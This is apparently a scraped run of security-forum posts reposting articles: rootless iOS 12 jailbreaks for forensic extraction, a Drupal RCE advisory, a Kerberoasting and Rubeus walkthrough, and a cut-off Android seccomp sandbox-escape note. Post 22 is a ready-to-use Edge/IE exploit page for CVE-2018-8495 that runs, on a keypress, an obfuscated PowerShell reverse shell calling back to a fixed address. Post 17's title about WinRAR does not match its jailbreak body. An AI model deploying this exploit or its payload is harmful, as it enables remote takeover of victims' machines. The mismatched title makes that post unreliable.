  17. Extracting a 19 Year Old Code Execution from WinRAR The new generation of jailbreaks has arrived. Available for iOS 11 and iOS 12 (up to and including iOS 12.1.2), rootless jailbreaks offer significantly more forensically sound extraction compared to traditional jailbreaks. Learn how rootless jailbreaks are different to classic jailbreaks, why they are better for forensic extractions and what traces they leave behind. Privilege Escalation If you are follow our blog, you might have already seen articles on iOS jailbreaking. In case you didn’t, here are a few recent ones to get you started: Physical Extraction and File System Imaging of iOS 12 Devices Using iOS 11.2-11.3.1 Electra Jailbreak for iPhone Physical Acquisition iPhone Physical Acquisition: iOS 11.4 and 11.4.1 In addition, we published an article on technical and legal implications of iOS file system acquisition that’s totally worth reading. Starting with the iPhone 5s, Apple’s first iOS device featuring a 64-bit SoC and Secure Enclave to protect device data, the term “physical acquisition” has changed its meaning. In earlier (32-bit) devices, physical acquisition used to mean creating a bit-precise image of the user’s encrypted data partition. By extracting the encryption key, the tool performing physical acquisition was able to decrypt the content of the data partition. Secure Enclave locked us out. For 64-bit iOS devices, physical acquisition means file system imaging, a higher-level process compared to acquiring the data partition. In addition, iOS keychain can be obtained and extracted during the acquisition process. Low-level access to the file system requires elevated privileges. Depending on which tool or service you use, privilege escalation can be performed by directly exploiting a vulnerability in iOS to bypass system’s security measures. This is what tools such as GrayKey and services such as Cellebrite do. If you go this route, you have no control over which exploit is used. You won’t know exactly which data is being altered on the device during the extraction, and what kind of traces are left behind post extraction. In iOS Forensic Toolkit, we rely on public jailbreaks to circumvent iOS security measures. The use of public jailbreaks as opposed to closed-source exploits has its benefits and drawbacks. The obvious benefit is the lower cost of the entire solution and the fact you can choose the jailbreak to use. On the other hand, classic jailbreaks were leaving far too many traces, making them a bit overkill for the purpose of file system imaging. A classic jailbreak has to disable signature checks to allow running unsigned code. A classic jailbreak would include Cydia, a third-party app store that requires additional layers of development to work on jailbroken devices. In other words, classic jailbreaks such as Electra, Meridian or unc0ver carry too many extras that aren’t needed or wanted in the forensic world. There is another issue with classic jailbreaks. In order to gain superuser privileges, these jailbreaks remount the file system and modify the system partition. Even after you remove the jailbreak post extraction, the device you were investigating will never be the same. It may or may not take OTA iOS updates, and it may (and often will) become unstable in operation. A full system restore through iTunes followed by a factory reset are often required to bring the device back to norm. Rootless Jailbreak Explained With classic jailbreaks being what they are, we actively searched for a different solution. It was that moment the rootless jailbreak has arrived. Rootless jailbreaks have significantly smaller footprint compared to classic ones. While offering everything required for file system extraction (including SSH shell), they don’t bundle unwanted extras such as the Cydia store. Most importantly, rootless jailbreaks do not alter the content of the system partition, which makes it possible for the expert to remove the jailbreak and return the system to clean pre-jailbroken state. All this makes using rootless jailbreaks a significantly more forensically sound procedure compared to using classic jailbreaks. So how exactly a rootles jailbreak is different from full-root jailbreak? Let’s take a closer look. What is a regular jailbreak? A common definition of jailbreak is “privilege escalation for the purpose of removing software restrictions imposed by Apple”. In addition, “jailbreaking permits root access.” Root access means being able to read (and write) to the root of the file system. A full jailbreak grants access to “/” in order to give the user the ability to run unsigned software packages while bypassing Apple restrictions. Giving access to the root of the file system requires a file system remount. The jailbreak would then write some files to the system partition, thus modifying the device and effectively breaking OTA functionality. Why do classic jailbreaks need to write anything onto the system partition? The thing is, kppless jailbreaks cannot execute binaries in the user partition. Such attempts are errored with “Operation not permitted”. Obviously, apps installed from the App Store are located on the user partition and can run without a problem; the problem is getting unsigned binaries to run. The lazy way of achieving this task was putting binaries onto the system partition and going from there. What is rootless jailbreak then? “Rootless doesn’t mean without root, it means without ability to write in the root partition” (redmondpie). Just as the name implies, a rootless jailbreak does not grant access to the root of the file system (“/”). The lowest level to which access is provided is the /var directory. This is considered to be a lot safer as nothing can modify or change system files to cause unrepairable damage. Is It Safe? This is a valid question we’ve been asked a lot. If you read the Physical Extraction and File System Imaging of iOS 12 Devices, you could see that installing the rootless jailbreak involves using a third-party Web site. Exposing an iPhone being investigated to Internet connectivity can be risky, especially if you don’t have authority to make Apple block all remote lock/remote wipe requests originated via the Find My iPhone service. We are currently researching the possibility of installing the jailbreak offline. If you need full transparency and accountability, you can compile your own IPA file from source code: https://github.com/jakeajames/rootlessJB3 You will then have to sign the IPA file and sideload it onto the iOS device you’re about to extract, at which point the device will still have to verify the validity of the certificate by connecting to an Apple server. More information about the development of the rootless jailbreak can be found in the following write-up: How to make a jailbreak without a filesystem remount as r/w Rootless Jailbreak: Modified Data and Life Post Extraction The rootless jailbreak is available in source code. Because of this, one can analyze what data exactly is altered on the device. Knowing what is modified, experts can include this information in their reports. At very least, rootlessJB modifies the following data on the device: /var/containers/Bundle/Application/rootlessJB – the jailbreak itself /var/containers/Bundle/iosbinpack64 – additional binaries and utilities /var/containers/Bundle/iosbinpack64/LaunchDaemons – launch daemons /var/containers/Bundle/tweaksupport – filesystem simulation where tweaks and stuff get installed Symlinks include: /var/LIB, /var/ulb, /var/bin, /var/sbin, /var/Apps, /var/libexec In addition, we expect to see some traces in various system logs. This is unavoidable with any extraction method with or without a jailbreak. The only way to completely avoid traces in iOS system logs would be imaging the device through DFU more or its likes, followed by the decryption of the data partition (which is not possible on any modern iOS device). Conclusion The rootless jailbreak is the foundation that allows us to image the file system on Apple devices running all versions of iOS from iOS 12.0 to 12.1.2. In essence, rootless jailbreaks have everything that forensic experts need, and bundles none of the unwanted stuff included with full jailbreaks. The rootless jailbreak grants access to /var instead of / which makes it safer and easier to remove without long lasting consequences. While not fully forensically sound, rootless jailbreak is much closer to offering a clean extraction compared to classic “full jailbreaks”. Sursa: https://blog.elcomsoft.com/2019/02/ios-12-rootless-jailbreak/
  18. Physical Extraction and File System Imaging of iOS 12 Devices February 21st, 2019 by Oleg Afonin The new generation of jailbreaks has arrived for iPhones and iPads running iOS 12. Rootless jailbreaks offer experts the same low-level access to the file system as classic jailbreaks – but without their drawbacks. We’ve been closely watching the development of rootless jailbreaks, and developed full physical acquisition support (including keychain decryption) for Apple devices running iOS 12.0 through 12.1.2. Learn how to install a rootless jailbreak and how to perform physical extraction with Elcomsoft iOS Forensic Toolkit. Jailbreaking and File System Extraction We’ve published numerous articles on iOS jailbreaks and their connection to physical acquisition. Elcomsoft iOS Forensic Toolkit relies on public jailbreaks to gain access to the device’s file system, circumvent iOS security measures and access device secrets allowing us to decrypt the entire content of the keychain including keychain items protected with the highest protection class. If you’re interested in jailbreaking, read our article on using iOS 11.2-11.3.1 Electra jailbreak for iPhone physical acquisition. The Rootless Jailbreak While iOS Forensic Toolkit does not rely public jailbreaks to circumvent the many security layers in iOS, it does not need or use those parts of it that jailbreak developers spend most of their efforts on. A classic jailbreak takes many steps that are needed to allow running third-party software and installing the Cydia store that are not required for physical extraction. Classic jailbreaks also remount the file system to gain access to the root of the file system, which again is not necessary for physical acquisition. For iOS 12 devices, the Toolkit makes use of a different class of jailbreaks: the rootless jailbreak. Rootless jailbreak has significantly smaller footprint compared to traditional jailbreaks since it does not use or bundle the Cydia store. Unlike traditional jailbreaks, a rootless jailbreak does not remount the file system. Most importantly, a rootless jailbreak does not alter the content of the system partition, which makes it possible for the expert to remove the jailbreak after the acquisition without requiring a system restore to return the system partition to its original unmodified state. All this makes using rootless jailbreaks a significantly more forensically sound procedure compared to using classic jailbreaks. Note: Physical acquisition of iOS 11 devices makes use of a classic (not rootless) jailbreak. More information: physical acquisition of iOS 11.4 and 11.4.1 Steps to Install rootlessJB If you read our previous articles on jailbreaking and physical acquisition, you’ve become accustomed to the process of installing a jailbreak with Cydia Impactor. However, at this time there is no ready-made IPA file to install a rootless jailbreak in this manner. Instead, you can either compile the IPA from the source code (https://github.com/jakeajames/rootlessJB3) or follow the much simpler procedure of sideloading the jailbreak from a Web site. To install rootlessJB, perform the following steps. Note: rootlessJB currently supports iPhone 6s, SE, 7, 7 Plus, 8, 8 Plus, iPhone X. Support for iPhone 5s and 6 has been added but still unstable. Support for iPhone Xr, Xs and Xs Max is expected and is in development. On the iOS device you’re about to jailbreak open ignition.fun in Safari. Select rootlessJB by Jake James. Click Get. The jailbreak IPA will be sideloaded to your device. Open the Settings app and trust the newly installed Enterprise or Developer certificate. Note: a passcode (if configured) is required to trust the certificate. Tap rootlessJB to launch the app. Leave iSuperSU and Tweaks options unchecked and tap the “Jailbreak” button. You now have unrestricted access to the file system. Imaging the File System In order to extract data from an Apple device running iOS 12, you will need iOS Forensic Toolkit 5.0 or newer. You must install a jailbreak prior to extraction. Launch iOS Forensic Toolkit by invoking the “Toolkit-JB” command. Connect the iPhone to the computer using the Lightning cable. If you are able to unlock the iPhone, pair the device by confirming the “Trust this computer?” prompt and entering device passcode. If you cannot perform the pairing, you will be unable to perform physical acquisition. You will be prompted to specify the SSH port number. By default, the port number 22 can be specified by simply pressing Enter. From the main window, enter the “D” (DISABLE LOCK) command. This is required in order to access protected parts of the file system. From the main window, enter the “F” (FILE SYSTEM) command. You will be prompted to enter the root password. By default, the root password is ‘alpine’. You may need to enter the password several times. The file system image will be dumped as a single TAR archive. Wait while the file system is being extracted. This can be a lengthy process. When the process is finished, disconnect the device and proceed to analyzing the data. Decrypting the Keychain Physical acquisition is the only method that allows decrypting all keychain items regardless of their protection class. In order to extract (and decrypt) the keychain, perform the following steps (assuming that you have successfully paired and jailbroken the device). Launch iOS Forensic Toolkit by invoking the “Toolkit-JB” command. Connect the iPhone to the computer and specify the SSH port number (as described above). You will be prompted to enter the root password. By default, the root password is ‘alpine’. You may need to enter the password several times. From the main window, enter the “D” (DISABLE LOCK) command. This is required in order to access protected parts of the file system. Now enter the “K” (KEYCHAIN) command. You will be prompted for a path to save the keychain XML file. Specify iOS version (obviously, the second option). Enter ‘alpine’ when prompted for a password. The content of the keychain will be extracted and decrypted. When the process is finished, disconnect the device and proceed to analyzing the data. Note: if you see an error message asking to unlock the device, unlock the iPhone and make sure to use the “D” command to disable screen lock. Analyzing the Data You can use Elcomsoft Phone Viewer to analyze the TAR file. In order to view the content of the keychain, you’ll need Elcomsoft Phone Breaker. Sursa: https://blog.elcomsoft.com/2019/02/physical-extraction-and-file-system-imaging-of-ios-12-devices/
  19. Este o intrebare buna si este dificil de raspuns. Depinde de multe lucruri: 1. Cel fel de termeni si conditii au 2. Legislatia care se aplica 3. Tara in care se afla serverul pe care va aparea tema de Wordpress 4. Cum reactioneaza partile implicate ...
  20. Salut. Alfa. Dar nu stiu de unde sa iei.
  21. Another Critical Flaw in Drupal Discovered — Update Your Site ASAP! February 21, 2019 Wang Wei Developers of Drupal—a popular open-source content management system software that powers millions of websites—have released the latest version of their software to patch a critical vulnerability that could allow remote attackers to hack your site. The update came two days after the Drupal security team released an advance security notification of the upcoming patches, giving websites administrators early heads-up to fix their websites before hackers abuse the loophole. The vulnerability in question is a critical remote code execution (RCE) flaw in Drupal Core that could "lead to arbitrary PHP code execution in some cases," the Drupal security team said. While the Drupal team hasn't released any technical details of the vulnerability (CVE-2019-6340), it mentioned that the flaw resides due to the fact that some field types do not properly sanitize data from non-form sources and affects Drupal 7 and 8 Core. It should also be noted that your Drupal-based website is only affected if the RESTful Web Services (rest) module is enabled and allows PATCH or POST requests, or it has another web services module enabled. If you can't immediately install the latest update, then you can mitigate the vulnerability by simply disabling all web services modules, or configuring your web server(s) to not allow PUT/PATCH/POST requests to web services resources. "Note that web services resources may be available on multiple paths depending on the configuration of your server(s)," Drupal warns in its security advisory published Wednesday. "For Drupal 7, resources are for example typically available via paths (clean URLs) and via arguments to the "q" query argument. For Drupal 8, paths may still function when prefixed with index.php/." However, considering the popularity of Drupal exploits among hackers, you are highly recommended to install the latest update: If you are using Drupal 8.6.x, upgrade your website to Drupal 8.6.10. If you are using Drupal 8.5.x or earlier, upgrade your website to Drupal 8.5.11 Drupal also said that the Drupal 7 Services module itself does not require an update at this moment, but users should still consider applying other contributed updates associated with the latest advisory if "Services" is in use. Drupal has credited Samuel Mortenson of its security team to discover and report the vulnerability. Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group. Sursa: https://thehackernews.com/2019/02/hacking-drupal-vulnerability.html?m=1
  22. <!doctype html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=10"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Cache" content="no-cache"> </head> <body> <b>Windows Edge/IE 11 - RCE (CVE-2018-8495)</b> </br></br> <!-- adapt payload since this one connectback on an internal IP address (just a private VM nothing else sorry ;) ) --> <a id="q" href='wshfile:test/../../system32/SyncAppvPublishingServer.vbs" test test;powershell -nop -executionpolicy bypass -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADUANgAuADEAIgAsADgAMAApADsAJABzAHQAcgBlAGEAbQAg AD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEA ZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4 AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMA dAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0 AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4A TABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=;"'>Exploit-it now !</a> <script> window.onkeydown=e=>{ window.onkeydown=z={}; q.click() } </script> </body> </html> Sursa: https://github.com/kmkz/exploit/blob/master/CVE-2018-8495.html
  23. Kerberoasting Revisited Will Feb 20 Rubeus is a C# Kerberos abuse toolkit that started as a port of @gentilkiwi‘s Kekeo toolset and has continued to evolve since then. For more information on Rubeus, check out the “From Kekeo to Rubeus” release post, the follow up “Rubeus — Now With More Kekeo”, or the recently revamped Rubeus README.md. I’ve made several recent enhancements to Rubeus, which included me heavily revisiting its Kerberoasting implementation. This resulted in some modifications to Rubeus’ Kerberoasting approach(es) as well as an explanation for some previous “weird” behaviors we’ve seen in the field. Since Kerberoasting is such a commonly used technique, I wanted to dive into detail now that we have a better understanding of its nuances. If you’re not familiar with Kerberoasting, there’s a wealth of existing information out there, some of which I cover in the beginning of this post. Much of this post won’t make complete sense if you don’t have a base understanding of how Kerberoasting (or Kerberos) works under the hood, so I highly recommend reading up a bit if you’re not comfortable with the concepts. But here’s a brief summary of the Kerberoasting process: A attacker authenticates to a domain and gets a ticket-granting-ticket (TGT) from the domain controller that’s used for later ticket requests. The attacker uses their TGT to issue a service ticket request (TGS-REQ) for a particular servicePrincipalName (SPN) of the form sname/host, e.g. MSSqlSvc/SQL.domain.com. This SPN should be unique in the domain, and is registered in the servicePrincipalName field of a user or computer account. During this request process, the attacker can specify what Kerberos encryption types they support (RC4_HMAC, AES256_CTS_HMAC_SHA1_96, etc). If the attacker’s TGT is valid, the DC extracts information from the TGT stuffs it into a service ticket. Then the domain controller looks up which account has the requested SPN registered in its servicePrincipalName field. The service ticket is encrypted with the hash of the account with the requested SPN registered, using the highest level encryption key that both the attacker and the service account support. The ticket is sent back to the attacker in a service ticket reply (TGS-REP). The attacker extracts the encrypted service ticket from the TGS-REP. Since the service ticket was encrypted with the hash of the account linked to the requested SPN, the attacker can crack this encrypted blob offline to recover the account’s plaintext password. A note on terminology. The three main encryption key types we’re going to be referring to in this post are RC4_HMAC_MD5 (ARCFOUR-HMAC-MD5, where an account’s NTLM hash functions as the key), AES128_CTS_HMAC_SHA1_96, and AES256_CTS_HMAC_SHA1_96. For conciseness I’m going to refer to these as RC4, AES128, and AES256. Also, all examples here are run from a Windows 10 client, against a Server 2012 domain controller with a 2012 R2 domain functional level. Kerberoasting Approaches Kerberoasting generally takes two general approaches: A standalone implementation of the Kerberos protocol that’s used through a device connected on a network, or via piping the crafted traffic in through a SOCKS proxy. Examples would be Meterpreter or Impacket. This requires credentials for a domain account to perform the roasting, since a TGT needs to be requested for use in the later service ticket requests. Using built-in Windows functionality on a domain-joined host (like the .NET KerberosRequestorSecurityToken class) to request tickets which are then extracted from the current logon session with Mimikatz or Rubeus. Alternatively, a few years ago @machosec realized the GetRequest() method can be used to carve out the service ticket bytes from KerberosRequestorSecurityToken, meaning we can forgo Mimikatz for ticket extraction. Another advantage of this approach is that the existing user’s TGT is used to request the service tickets, meaning we don’t need plaintext credentials or a user’s hash to perform the Kerberoasting. With Kerberoasting, we really want RC4 encrypted service ticket replies, as these are orders of magnitude faster to crack than their AES equivalents. If we implement the protocol on the attacker side, we can choose to indicate we only support RC4 during the service ticket request process, resulting in the easier to crack hash format. On the host side, I used to believe that the KerberosRequestorSecurityToken approach requested RC4 tickets by default as this is typically what is returned, but in fact the “normal” ticket request behavior occurs where all supported ciphers are supported. So why are RC4 hashes usually returned by this approach? Time for a quick detour. msDS-SupportedEncryptionTypes One defensive indicator we’ve talked about in the past is “encryption downgrade activity”. As modern domains (functional level 2008 and above) and computers (Vista/2008+) support using AES keys by default in Kerberos exchanges, the use of RC4 in any Kerberos ticket-granting-ticket (TGT) requests or service ticket requests should be an anomaly. Sean Metcalf has an excellent post titled “Detecting Kerberoasting Activity” that covers how to approach DC events to detect this type of behavior, though as he notes “false positives are likely.” The full answer of why false positives are such a problem with this approach also explains some of the “weird” behavior I’ve seen over the years with Kerberoasting. To illustrate, let’s say we have a user account sqlservice that has MSSQLSvc/SQL.testlab.local registered in its servicePrincipalName (SPN) property. We can request a service ticket for this SPN with powershell -C “Add-Type -AssemblyName System.IdentityModel; $Null=New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList ‘MSSQLSvc/SQL.testlab.local’”. However, the resulting service ticket applied to the current logon session specifies RC4, despite the requesting user’s (harmj0y) TGT using AES256. As stated previously, for a long time I thought the KerberosRequestorSecurityToken approach for some reason specifically requested RC4. However, looking at a Wireshark capture of the TGS-REQ (Kerberos service ticket request) from the client we see that all proper encryption types including AES are specified as supported: The enc-part in the returned TGS-REP (service ticket reply) is properly encrypted with the requesting client’s AES256 key as we would expect. However the enc-part part we care about for Kerberoasting (contained within the returned service ticket) is encrypted with the RC4 key of the sqlservice account, NOT its AES key: So what’s going on? It turns out that this has nothing to do with the KerberosRequestorSecurityToken method. This method requests a service ticket specified by the supplied SPN so it can build an AP-REQ containing the service ticket for SOAP requests, and we can see above that it performs proper “normal” requests and states it supports AES encryption types. This behavior is due to the msDS-SupportedEncryptionTypes domain object property, something that was talked about a bit by Jim Shaver and Mitchell Hennigan in their DerbyCon “Return From The Underworld: The Future Of Red Team Kerberos” talk. This property is a 32-bit unsigned integer defined in [MS-KILE] 2.2.7 that represents a bitfield with the following possible values: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/6cfc7b50-11ed-4b4d-846d-6f08f0812919 According to Microsoft’s [MS-ADA2], “The Key Distribution Center (KDC) uses this information [msDS-SupportedEncryptionTypes] while generating a service ticket for this account.” So even if a domain supports AES encryption (i.e. domain functional 2008 and above) the value of the msDS-SupportedEncryptionTypes field on the account with the requested SPN registered is what determines the encryption level for the service ticket returned in the Kerberoasting process. According to MS-KILE 3.1.1.5 the default value for this field is 0x1C (RC4_HMAC_MD5 | AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96 = 28) for Windows 7+ and Server 2008R2+. This is why service tickets for machines nearly always use AES256, as the highest mutually supported encryption type will be used in a Kerberos ticket exchange. We can confirm this the result of doing a dir \\primary.testlab.local\C$ command followed by Rubeus.exe klist : However, this property is only set by default on computer accounts, not user accounts. If this property is not defined, or is set to 0, [MS-KILE] 3.3.5.7 tells us the default behavior is to use a value of 0x7, meaning RC4 will be used to encrypt the service ticket. So in the previous example for the MSSQLSvc/SQL.testlab.local SPN that’s registered to the user account sqlservice we received a ticket using the RC4 key. If we select “This account supports AES [128/256] bit encryption” in Active Directory Users and Computers, then the msDS-SupportedEncryptionTypes is set to 24, specifying only AES 128/256 encryption should be supported. When I first was looking at this, I assumed that this meant that since the msDS-SupportedEncryptionTypes value was non-null, and the RC4 bit was NOT present, that if you specify only RC4 when requesting a service ticket (via the /tgtdeleg flag here) for an account configured this way the exchange would error out. But guess what? We still get an RC4 (type 23) encrypted ticket that we can crack! A Wireshark capture confirms that RC4 is the only supported etype in the request, and that the ticket enc-part is indeed encrypted with RC4. ¯\_(ツ)_/¯ I’m assuming that this is for failsafe backwards compatibility reasons, and I ran this scenario in multiple test domains with the same result. However someone else I asked to recreate wasn’t able to, so I’m not sure if I’m missing something or if this accurately reflects normal domain behavior. If anyone has any more information on this, or is/isn’t about to recreate, please let me know! Why does the above matter? If true, it implies that there doesn’t seem to be an easy way to disable RC4_HMAC on user accounts. This means that even if you enable AES encryption for user accounts with servicePrincipalName fields set, these accounts are still Kerberoastable with the hacker-friendly RC4 flavor of encryption keys! After a bit of testing, it appears that if you disable RC4 at the domain/domain controller level as described in this post, then requesting a RC4 service ticket for any account will fail with KDC_ERR_ETYPE_NOTSUPP. However, TGT requests will no longer work with RC4 either. As this might cause lots of things to break, definitely try this in a lab environment first before making any changes in production. Sidenote: the msDS-SupportedEncryptionTypes property can also be set for trustedDomain objects that represent domain trusts, but it is also initially undefined. This is why inter-domain trust tickets end up using RC4 by default: However, like with user objects, this behavior can be changed by modifying the properties of the trusted domain object, specifying that the foreign domain supports AES: This sets msDS-SupportedEncryptionTypes on the trusted domain object to a value of 24 (AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96), meaning that AES256 inter-domain trust tickets will be issued by default: Trying to Build a Better Kerberoast Due to the way we tend to execute engagements, we often lean towards abusing host-based functionality versus piping in our own protocol implementation from an attacker server. We often times operate over high-latency command and control, so for complex multi-party exchanges like Kerberos our personal preference has traditionally been the KerberosRequestorSecurityToken approach for Kerberoasting. But as I mentioned in the first section, this method requests that highest supported encryption type when requesting a service ticket. For user accounts that have AES enabled, this default method will return ticket with an encryption type of AES256 (type 18 in the hash): Now, an obvious alternative method for Rubeus’ Kerberoasting would be to allow an existing TGT blob/file to be specified that would then be used in the ticket requests. If we have a real TGT and are implementing the raw TGS-REQ/TGS-REP process and extracting out the proper encrypted parts manually, we can specify whatever encryption type support we want when issuing the service ticket request. So if we have AES-enabled accounts, we can still get an RC4 based ticket to crack offline! This approach is in fact now implemented in Rubeus with the /ticket:<blob/file.kirbi> parameter for the kerberoast command. So what’s the disadvantage here? Well, you need a ticket-granting-ticket to build the raw TGS-REQ service ticket request, so you need to either a) be elevated on a system and extract out another user’s TGT or b) have a user’s hash that you use with the asktgt module to request a new TGT. If you’re curious why a user can’t extract out a usable version of their TGT without elevation, check out the explanation in the “Rubeus — Now With More Kekeo” post. The solution is @gentilkiwi’s Kekeo tgtdeleg trick, that uses the Kerberos GSS-API to request a “fake” delegation for a target SPN that has unconstrained delegation enabled (e.g. cifs/DC.domain.com). This was previously implemented in Rubeus with the tgtdeleg command. This approach allows us to extract a usable TGT for the current user, including the session key. Why don’t we then use this “fake” delegation TGT when performing out TGS-REQs for “vulnerable” SPNs, specifying RC4 as the only encryption algorithm we support? The new kerberost /tgtdeleg option does just that! There have also been times in the field where the default KerberosRequestorSecurityToken Kerberoasting method has just failed- we’re hoping that the /tgtdeleg option may work in some of these situations. If we want to go a bit further and avoid the possible “encryption downgrade” indicator, we can search for accounts that don’t have AES encryption types supported, and then state we support all encryption types in the service ticket request. Since the highest supported encryption type for the results will be RC4, we’ll still get crackable tickets. The kerberoast /rc4opsec command executes the tgtdeleg trick and filters out any of these AES-enabled accounts: If we want the opposite and only want AES enabled accounts, the /aes flag will do the opposite LDAP filter. While we don’t currently have tools to crack tickets that use AES (and even once we do, speeds will be thousands of times slower due to the AES key derivation algorithms), progress is being made. Another advantage of the /tgtdeleg approach for Kerberoasting is that since we’re building and parsing the TGS-REQ/TGS-REP traffic manually, the service tickets won’t be cache on the system we’re roasting from. The default KerberosRequestorSecurityToken method results in a service ticket cached in the current logon session for every SPN we’re roasting. The /tgtdeleg approach results in a single additional cifs/DC.domain.com ticket being added to the current logon session, minimizing a potential host-based indicator (i.e. massive numbers of service tickets in a user’s logon session). As a reference, in the README I built a table comparing the different Rubeus Kerberoasting approaches: As a final note, Kerberoasting should work much better over domain trusts as of this commit. Two foreign trusted domain examples have been added to the kerberoast section of the README. Conclusion Hopefully this cleared up some of the confusion some (like me) may have had surrounding different encryption support in regards to Kerberoasting. I’m also eager for people to try out the new Rubeus roasting options to see how they work in the field. As always, if I made some mistake in this post, let me know and I’ll correct it as soon as I can! Also, if anyone has insight on the RC4-tickets-still-being-issued-for-AES-only-accounts situation, please shoot me an email (will [at] harmj0y.net) or hit me up in the BloodHound Slack. Sursa: https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1
  24. /* The seccomp.2 manpage (http://man7.org/linux/man-pages/man2/seccomp.2.html) documents: Before kernel 4.8, the seccomp check will not be run again after the tracer is notified. (This means that, on older ker‐ nels, seccomp-based sandboxes must not allow use of ptrace(2)—even of other sandboxed processes—without extreme care; ptracers can use this mechanism to escape from the sec‐ comp sandbox.) Multiple existing Android devices with ongoing security support (including Pixel 1 and Pixel 2) ship kernels older than that; therefore, in a context where ptrace works, seccomp policies that don't blacklist ptrace can not be considered to be security boundaries. The zygote applies a seccomp sandbox to system_server and all app processes; this seccomp sandbox permits the use of ptrace: ================ ===== filter 0 (164 instructions) ===== 0001 if arch == AARCH64: [true +2, false +0] [...] 0010 if nr >= 0x00000069: [true +1, false +0] 0012 if nr >= 0x000000b4: [true +17, false +16] -> ret TRAP 0023 ret ALLOW (syscalls: init_module, delete_module, timer_create, timer_gettime, timer_getoverrun, timer_settime, timer_delete, clock_settime, clock_gettime, clock_getres, clock_nanosleep, syslog, ptrace, sched_setparam, sched_setscheduler, sched_getscheduler, sched_getparam, sched_setaffinity, sched_getaffinity, sched_yield, sched_get_priority_max, sched_get_priority_min, sched_rr_get_interval, restart_syscall, kill, tkill, tgkill, sigaltstack, rt_sigsuspend, rt_sigaction, rt_sigprocmask, rt_sigpending, rt_sigtimedwait, rt_sigqueueinfo, rt_sigreturn, setpriority, getpriority, reboot, setregid, setgid, setreuid, setuid, setresuid, getresuid, setresgid, getresgid, setfsuid, setfsgid, times, setpgid, getpgid, getsid, setsid, getgroups, setgroups, uname, sethostname, setdomainname, getrlimit, setrlimit, getrusage, umask, prctl, getcpu, gettimeofday, settimeofday, adjtimex, getpid, getppid, getuid, geteuid, getgid, getegid, gettid, sysinfo) 0011 if nr >= 0x00000068: [true +18, false +17] -> ret TRAP 0023 ret ALLOW (syscalls: nanosleep, getitimer, setitimer) [...] 002a if nr >= 0x00000018: [true +7, false +0] 0032 if nr >= 0x00000021: [true +3, false +0] 0036 if nr >= 0x00000024: [true +1, false +0] 0038 if nr >= 0x00000028: [true +106, false +105] -> ret TRAP 00a2 ret ALLOW (syscalls: sync, kill, rename, mkdir) 0037 if nr >= 0x00000022: [true +107, false +106] -> ret TRAP 00a2 ret ALLOW (syscalls: access) 0033 if nr >= 0x0000001a: [true +1, false +0] 0035 if nr >= 0x0000001b: [true +109, false +108] -> ret TRAP 00a2 ret ALLOW (syscalls: ptrace) 0034 if nr >= 0x00000019: [true +110, false +109] -> ret TRAP 00a2 ret ALLOW (syscalls: getuid) [...] ================ The SELinux policy allows even isolated_app context, which is used for Chrome's renderer sandbox, to use ptrace: ================ # Google Breakpad (crash reporter for Chrome) relies on ptrace # functionality. Without the ability to ptrace, the crash reporter # tool is broken. # b/20150694 # https://code.google.com/p/chromium/issues/detail?id=475270 allow isolated_app self:process ptrace; ================ Chrome applies two extra layers of seccomp sandbox; but these also permit the use of clone and ptrace: ================ ===== filter 1 (194 instructions) ===== 0001 if arch == AARCH64: [true +2, false +0] [...] 0002 if arch != ARM: [true +0, false +60] -> ret TRAP [...] 0074 if nr >= 0x0000007a: [true +1, false +0] 0076 if nr >= 0x0000007b: [true +74, false +73] -> ret TRAP 00c0 ret ALLOW (syscalls: uname) 0075 if nr >= 0x00000079: [true +75, false +74] -> ret TRAP 00c0 ret ALLOW (syscalls: fsync, sigreturn, clone) [...] 004d if nr >= 0x0000001a: 